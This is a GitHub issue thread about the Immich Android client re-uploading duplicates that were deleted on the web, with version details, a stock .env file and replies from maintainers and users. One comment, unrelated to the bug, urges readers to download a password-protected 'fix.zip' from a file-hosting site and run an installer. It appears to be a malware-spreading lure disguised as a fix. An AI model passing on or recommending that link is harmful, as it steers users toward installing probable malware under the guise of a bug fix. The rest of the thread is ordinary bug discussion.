### ISSUE TITLE
Android client keeps uploading deleted duplicates

### ISSUE THREAD

**Issue by eklavya** [immich-app/immich#12051]
### The bug

If you delete duplicates from the immich web app via the duplicate finding utility. The android client shows the deleted items as not uploaded and starts uploading them again. Tried this multiple times. I don't know if this behaviour is exhibited by the ios client or not.

### The OS that Immich Server is running on

Ubuntu 22.04.04

### Version of Immich Server

v1.112.1

### Version of Immich Mobile App

1.112.1.build.154

### Platform with the issue

- [X] Server
- [ ] Web
- [X] Mobile

### Your docker-compose.yml content

```YAML
Stock, no changes whatsoever.
```

### Your .env content

```Shell
# You can find documentation for all the supported env variables at https://immich.app/docs/install/environment-variables

# The location where your uploaded files are stored
UPLOAD_LOCATION=/media/2TB/immich/library
# The location where your database files are stored
DB_DATA_LOCATION=/media/2TB/immich/postgres

# To set a timezone, uncomment the next line and change Etc/UTC to a TZ identifier from this list: https://en.wikipedia.org/wiki/List_of_tz_database_time_zones#List
# TZ=Etc/UTC

# The Immich version to use. You can pin this to a specific version like "v1.71.0"
IMMICH_VERSION=release

# Connection secret for postgres. You should change it to a random password
# Please use only the characters `A-Za-z0-9`, without special characters or spaces
DB_PASSWORD=postgres

# The values below this line do not need to be changed
###################################################################################
DB_USERNAME=postgres
DB_DATABASE_NAME=immich
```
```


### Reproduction steps

```bash
1. Login to the web app, go to utilities > duplicates.
2. Delete all the duplicates.
3. Open android client to see all the deleted items are being uploaded again.
```

**Comment by luozhengdong** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by bo0tzz** [comment]
This is currently working as expected, there's a few open requests for changing this behaviour.

**Comment by eklavya** [comment]
Hi @bo0tzz, I respectfully disagree. Deleting duplicates to only have them uploaded again doesn't sound reasonable behaviour to me. Would it be possible to link where this was discussed before so I can get better informed about the reasoning behind it?

I can understand that repeating or explaining yourself again and again can get tiresome, your time is much appreciated.

**Comment by Bananas-Are-Yellow** [comment]
This is quite maddening. I removed all duplicates using the web interface. At this stage the problem does not occur, because they still exist on the server in the trash, but as soon as you empty the trash, the Android app decides to upload them all again!

Why is this closed? Is there a workaround?

**Comment by wcdgit** [comment]
I don't think we need a particularly sophisticated server-based solution for this problem. Wouldn't it be easier if the client app could just remember which files it has already uploaded? I think that's the way the Nextcloud Android app works.
